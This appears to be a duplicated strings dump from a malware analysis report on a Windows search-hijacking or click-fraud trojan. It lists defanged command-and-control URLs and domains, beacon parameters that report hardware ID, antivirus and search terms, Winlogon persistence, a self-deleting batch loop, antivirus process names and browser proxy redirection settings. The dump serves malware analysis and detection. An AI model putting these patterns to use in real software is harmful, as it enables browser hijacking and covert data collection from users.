w1.3.14.3.2.22

w1.3.14.3.2.22

WINDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark

WINDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark

NDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark

NDOWS;%WinDir%\System32\Wbem;c:\Program Files\Wireshark

%Documents and Settings%\%current user%\Local Settings\History

%Documents and Settings%\%current user%\Local Settings\History

RSVP TCP Service Provider

RSVP TCP Service Provider

%original file name%.exe_1288_rwx_00158000_00001000:

CryptSIPDllPutSignedDataMsg

CryptSIPDllPutSignedDataMsg

\WINDOWS\system32\rasadhlp.dll

\WINDOWS\system32\rasadhlp.dll

%original file name%.exe_1288_rwx_00400000_0008E000:

`.rsrc

`.rsrc

SSj%S

SSj%S

cmd.exe

cmd.exe

GetProcessWindowStation

GetProcessWindowStation

operator

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

1.2.5

>`Visual C CRT: Not enough memory to complete call to strerror.

>`Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d lines of %s read.

%d Function Prototypes found.

%d Function Prototypes found.

Including %d Library Functions.

Including %d Library Functions.

.bss align=16

.bss align=16

copy /b data.tmp bss.tmp code.tmp %s

copy /b data.tmp bss.tmp code.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

del *.tmp

del *.tmp

copy /b data.tmp code.tmp %s

copy /b data.tmp code.tmp %s

al,%s

al,%s

eax,%s

eax,%s

%s is not valid in:

%s is not valid in:

Warning - Return from non-void function %s with no value

Warning - Return from non-void function %s with no value

elend

elend

.text

.text

Warning -- "break" not supported in:

Warning -- "break" not supported in:

Error: %s not defined!

Error: %s not defined!

.data align=16

.data align=16

B1-1231 Warning - %s re-defined!

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d db 0

times %d dd 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

\Windows NT

%s\%s

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

Advapi32.dll

%s%s_1

%s%s_1

%s_0_%d_%s

%s_0_%d_%s

%s_%d

%s_%d

%s_%d_%d_%d_%d

%s_%d_%d_%d_%d

%s_%s

%s_%s

hXXp://xprstats.com/k1.php

hXXp://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

type=%s&system=na&id=%s&status=%s

t=st&q=%s

t=st&q=%s

%s?tq=%s

%s?tq=%s

TMFLDMN%d

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=117

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=117

%s_%s_%d

%s_%s_%d

_1_%d

_1_%d

_2_%d

_2_%d

_3_%d

_3_%d

_4_%d

_4_%d

firoli-sys.com

firoli-sys.com

hoststorageforyou.com

hoststorageforyou.com

wwwmediahosts.com

wwwmediahosts.com

hdmediastore.com

hdmediastore.com

halinoiser.com

halinoiser.com

allforyourimage.com

allforyourimage.com

onlinepdahelpforyou.com

onlinepdahelpforyou.com

remarkreddomas.com

remarkreddomas.com

transfersakkonline.com

transfersakkonline.com

backupdomaintolevel.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

SELECT_RESERV_SRV_%d

hXXp://%s.%s

hXXp://%s.%s

%s.%s

%s.%s

stor.cfg

stor.cfg

exec%s

exec%s

%s_%d_%s

%s_%d_%s

id=%s&c=%d

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d_%d

%s_%d_%d

%s_%d_%d

%s %s

%s %s

%s start%s%c%s

%s start%s%c%s

c1.exe

c1.exe

c2.exe

c2.exe

c3.exe

c3.exe

DWN_CON_STRP_%d_%s

DWN_CON_STRP_%d_%s

hXXp://

hXXp://

hXXp://%d.ctrl.%s

hXXp://%d.ctrl.%s

logo.png

logo.png

img/135.png

img/135.png

img/136.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

hXXp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

hXXp://binghamtonschools.org/images/297893.jpg

hXXp://binghamtonschools.org/images/297893.jpg

hXXp://binghamtonschools.org/images/297894.jpg

hXXp://binghamtonschools.org/images/297894.jpg

hXXp://alleducationalsoftware.com/creditcardlogos.gif

hXXp://alleducationalsoftware.com/creditcardlogos.gif

hXXp://alleducationalsoftware.com/creditcard.png

hXXp://alleducationalsoftware.com/creditcard.png

hXXp://alleducationalsoftware.com/creditcard2.png

hXXp://alleducationalsoftware.com/creditcard2.png

hXXp://patentgenius.com/temp/head.png

hXXp://patentgenius.com/temp/head.png

hXXp://patentgenius.com/132.gif

hXXp://patentgenius.com/132.gif

hXXp://patentgenius.com/133.gif

hXXp://patentgenius.com/133.gif

hXXp://freedownload3.com/screenshot/4/s/89_3276.gif

hXXp://freedownload3.com/screenshot/4/s/89_3276.gif

hXXp://freedownload3.com/screenshot/4/s/89_3277.gif

hXXp://freedownload3.com/screenshot/4/s/89_3277.gif

hXXp://freedownload3.com/screenshot/4/s/89_3278.gif

hXXp://freedownload3.com/screenshot/4/s/89_3278.gif

hXXp://istockanalyst.com/png/intel.gif

hXXp://istockanalyst.com/png/intel.gif

hXXp://istockanalyst.com/png/intel.jpg

hXXp://istockanalyst.com/png/intel.jpg

hXXp://istockanalyst.com/12.jpg

hXXp://istockanalyst.com/12.jpg

hXXp://complaintsboard.com/complaints/logo.png

hXXp://complaintsboard.com/complaints/logo.png

hXXp://complaintsboard.com/complaints/zip.png

hXXp://complaintsboard.com/complaints/zip.png

hXXp://complaintsboard.com/complaints/rar.png

hXXp://complaintsboard.com/complaints/rar.png

hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi

hXXp://highspeedinternetlosangeles.webnode.com/news/1.cgi

hXXp://highspeedinternetlosangeles.webnode.com/news/1.php

hXXp://highspeedinternetlosangeles.webnode.com/news/1.php

hXXp://highspeedinternetlosangeles.webnode.com/news/2.php

hXXp://highspeedinternetlosangeles.webnode.com/news/2.php

hXXp://newworldorderreport.com/favicon.ico

hXXp://newworldorderreport.com/favicon.ico

hXXp://newworldorderreport.com/img/3421.png

hXXp://newworldorderreport.com/img/3421.png

hXXp://newworldorderreport.com/img/3422.png

hXXp://newworldorderreport.com/img/3422.png

hXXp://jointhenewworldorder.com/images/pages.jpg

hXXp://jointhenewworldorder.com/images/pages.jpg

hXXp://jointhenewworldorder.com/images/pages.png

hXXp://jointhenewworldorder.com/images/pages.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

hXXp://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

hXXp://cdn.adventofdeception.com/logo.png

hXXp://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

%s?sv=%d&tq=%s

\bl%d_64.bat

\bl%d_64.bat

del "%s"

del "%s"

if exist "%s" goto a

if exist "%s" goto a

cmd.exe /c "%s"

cmd.exe /c "%s"

GET %s HTTP/1.1

GET %s HTTP/1.1

Host: %s

Host: %s

User-Agent: chrome/9.0

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

ahst.lni

milktoyoustudios.com

milktoyoustudios.com

hXXp://%s/s.php?c=121&id=%s

hXXp://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

bigbulkhypnocrys.com

hXXp://xprstats.com/images/logo.png

hXXp://xprstats.com/images/logo.png

drweb

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

t=ml&q=%s

xprstats.com

xprstats.com

hXXp://%s%s

hXXp://%s%s

%s_1_%d_%s

%s_1_%d_%s

%s_2_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_3_%d_%s

%s_4_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

pmv=2&id=%s&hwid=%s

u.exe

u.exe

%s up%s

%s up%s

&%s=%s

&%s=%s

avgnt.exe

avgnt.exe

AVGIDSAgent.exe

AVGIDSAgent.exe

avgwdsvc.exe

avgwdsvc.exe

ccsvchst.exe

ccsvchst.exe

AvastUI.exe

AvastUI.exe

mcagent.exe

mcagent.exe

PRM_LSTN_THIS_PORT

PRM_LSTN_THIS_PORT

Opera

Opera

127.0.0.1

127.0.0.1

HTTP/1.x

HTTP/1.x

google.com

google.com

hXXp://VVV.google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

HTTP/1.1 302 Found

Location: %s

Location: %s

id=%s&type=%d&ppcid=%s

id=%s&type=%d&ppcid=%s

%s: %s

%s: %s

%s_5_%s

%s_5_%s

http=127.0.0.1:

http=127.0.0.1:

prefs.js

prefs.js

Mozilla

Mozilla

"network.proxy.http"

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.http_port"

"network.proxy.type"

"network.proxy.type"

"127.0.0.1"

"127.0.0.1"

%s(%s, %s);

%s(%s, %s);

operaprefs.ini

operaprefs.ini

Use HTTP

Use HTTP

HTTP server

HTTP server

127.0.0.1:%s

127.0.0.1:%s

%s=%s

%s=%s

%s:%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

id=%s&hwid=%s

exec|%s

exec|%s

http=

http=

HTTP/1.0 200 OK

HTTP/1.0 200 OK

bing.com

bing.com

yahoo.com

yahoo.com

search.aol.

search.aol.

suche.aol.

suche.aol.

searcht2.aol.

searcht2.aol.

.yimg.com

.yimg.com

.bing.net

.bing.net

scorecardresearch.com

scorecardresearch.com

brightcove.com

brightcove.com

.aol.

.aol.

.atwola.

.atwola.

.ivwbox.

.ivwbox.

.google

.google

.atdmt.

.atdmt.

.abmr.

.abmr.

.tacoda.

.tacoda.

.adtechus.

.adtechus.

.autodatadirect.

.autodatadirect.

.mapquestapi.

.mapquestapi.

.ggpht.

.ggpht.

.virtualearth.

.virtualearth.

.opera.

.opera.

.microsoft.

.microsoft.

.wsod.

.wsod.

.doubleclick.

.doubleclick.

.ypcdn.

.ypcdn.

.truveo.

.truveo.

.tlowdb.

.tlowdb.

mapq.st

mapq.st

.dartsearch.

.dartsearch.

.thawte.

.thawte.

http://

http://

bing.com/search

bing.com/search

bing.com:80/search

bing.com:80/search

search.yahoo.com/search

search.yahoo.com/search

%s_1_%s

%s_1_%s

err%d%s_%d_%d

err%d%s_%d_%d

err0%s_%d_%d

err0%s_%d_%d

ver=117&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

ver=117&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s:443/%s

%s_2_%s

%s_2_%s

%s_%s_%s

%s_%s_%s

%s_3_%s

%s_3_%s

VVV.VVV.ru

VVV.VVV.ru

hXXps://

hXXps://

.doubleclick.net

.doubleclick.net

doubleclick.net

doubleclick.net

msn.com

msn.com

%s_0%d_%d

%s_0%d_%d

=='undefined'?'%s':'%s'

=='undefined'?'%s':'%s'

.referrer

.referrer

HTTP/1.0

HTTP/1.0

%s %s %s

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

hXXp://VVV.yahoo.com/

.class

.class

.midi

.midi

google_ad.url

google_ad.url

google_ad.title

google_ad.title

r.msn.com

r.msn.com

google_ad.line1

google_ad.line1

zcÁ

zcÁ

c:\%original file name%.exe

c:\%original file name%.exe

%Program Files%\CF2C6

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\B375

%Program Files%\LP\B375

GetCPInfo

GetCPInfo

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

WinHttpReadData

WinHttpReadData

WinHttpOpenRequest

WinHttpOpenRequest

WinHttpOpen

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpSendRequest

WinHttpConnect

WinHttpConnect

WinHttpCloseHandle

WinHttpCloseHandle

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

.rd(&

.rd(&

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

RASAPI32.dll

RASAPI32.dll

RPCRT4.dll

RPCRT4.dll

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

USER32.dll

USER32.dll

WINHTTP.dll

WINHTTP.dll

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

mscoree.dll

mscoree.dll

nKERNEL32.DLL

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

Dr.Web

Dr.Web

mhttp=127.0.0.1:%d

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

hXXp://VVV.yahoo.com

2.0.2.1

2.0.2.1